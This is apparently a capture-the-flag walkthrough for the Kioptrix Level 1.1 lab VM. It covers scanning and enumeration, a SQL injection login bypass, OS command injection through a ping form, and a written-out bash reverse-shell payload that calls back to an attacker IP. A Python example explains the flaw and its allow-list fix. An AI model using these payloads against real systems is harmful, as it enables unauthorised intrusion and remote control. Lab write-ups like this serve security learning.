KIOPTRIX: LEVEL 1.1 (#2) walkthrough
The object of the game is to acquire root access via any means possible (except actually hacking the VM server or player 😜). The purpose of these games is to learn the basic tools and techniques in vulnerability assessment and exploitation. There is more than one way to successfully complete the challenges.
Discovery
Find the Vuln machine using the netdiscover tool. We have to do this since we do not know the IP assigned to the Vuln Machine.
Enumeration
“Know the Enemy and Know Yourself”🔎
I always run an Nmap scan on all ports (-p-) because we have to be sure we do not miss any minor details.
sudo nmap -p- -T4 -A 192.168.103.143
More Enumeration 💕
- 22|SSH
- 80|HTTP
1. See the website and its source code.
The first thing that comes to my mind when I see a login portal is SQLi 👻. Then, I might try default passwords such as admin:admin, admin:password, root:root. 🤔
2. Always run Nikto alongside Gobuster + dirb.
Possible ones to check are:
- Apache + PHP < 5.3.12 / < 5.4.2 — cgi-bin Remote Code Execution🤔
- Apache < 2.2.34 / < 2.4.27 — OPTIONS Memory Leak🤔
- 111|rpcbind
- CUPS 1.1
Exploring Exploits
“Can you imagine what I would do if I could do all I can?” — Sun Tzu 🧙🏻♂️
I have listed all the possible points of attack from the previous steps.
- Apache + PHP < 5.3.12 / < 5.4.2 — cgi-bin Remote Code Execution
- Apache < 2.2.34 / < 2.4.27 — OPTIONS Memory Leak
- SQLi
Let’s try one by one 🤓…
1. Apache + PHP < 5.3.12 / < 5.4.2 — cgi-bin Remote Code Execution
2. Apache < 2.2.34 / < 2.4.27 — OPTIONS Memory Leak
No luck here as well…😩
3. SQLi
- Creds: Administrator:' OR 1 -- -
It looks like we can go for OS command Injection. Let’s try 8.8.8.8;ls as the input.
Payload : 8.8.8.8 && bash -i >& /dev/tcp/192.168.103.182/4444 0>&1
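Why the 8.8.8.8;ls test works, and what the fix looks like, as an added example that is not code from the target application: it assumes the form concatenates the field into a `ping -c 3 <input>` string for a shell (the page does not show the source), and uses Python as a stand-in. The names `shell_view`, `safe_ping_argv` and `is_accepted` are hypothetical.

```python
import ipaddress
import shlex

# Assumed command behind the ping form; the page does not show the application's source.
PING = ["ping", "-c", "3"]
SEPARATORS = {";", "&&", "||", "|", "&"}


def shell_view(field):
    """Approximate the commands a POSIX shell would run if the field were
    concatenated into 'ping -c 3 <field>' and passed as one string (vulnerable pattern)."""
    lexer = shlex.shlex("ping -c 3 " + field, posix=True, punctuation_chars=True)
    commands, current = [], []
    for token in lexer:
        if token in SEPARATORS:
            commands.append(current)
            current = []
        else:
            current.append(token)
    commands.append(current)
    return [c for c in commands if c]


def safe_ping_argv(field):
    """Hardened pattern: accept only a literal IP address and return an argv list
    meant for subprocess.run(argv, shell=False), so no shell ever parses the input."""
    address = ipaddress.ip_address(field.strip())  # ValueError for anything else
    return PING + [str(address)]


def is_accepted(field):
    """True only when the field passes the allow-list check above."""
    try:
        safe_ping_argv(field)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    # Constructed inputs: a plain address and the 8.8.8.8;ls probe from the text above.
    for field in ("8.8.8.8", "8.8.8.8;ls"):
        print(repr(field), "shell sees", shell_view(field), "accepted:", is_accepted(field))
```

The same two controls apply whatever language the form is written in: validate the field against what it is supposed to be (an IP address), and pass it to the program as a separate argument rather than through a shell.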
Privilege Escalation
“There are not more than five musical notes, yet the combinations of these five give rise to more melodies than can ever be heard. There are not more than five primary colors, yet in combination they produce more hues than can ever be seen. There are not more than five cardinal tastes, yet combinations of them yield more flavors than can ever be tasted.” — Sun Tzu 🧙🏻♂️
Enumeration
Use the above info to find a kernel exploit.
Transfer the file to the Vuln machine…👻
“If the mind is willing, the flesh could go on and on without many things.” — Sun Tzu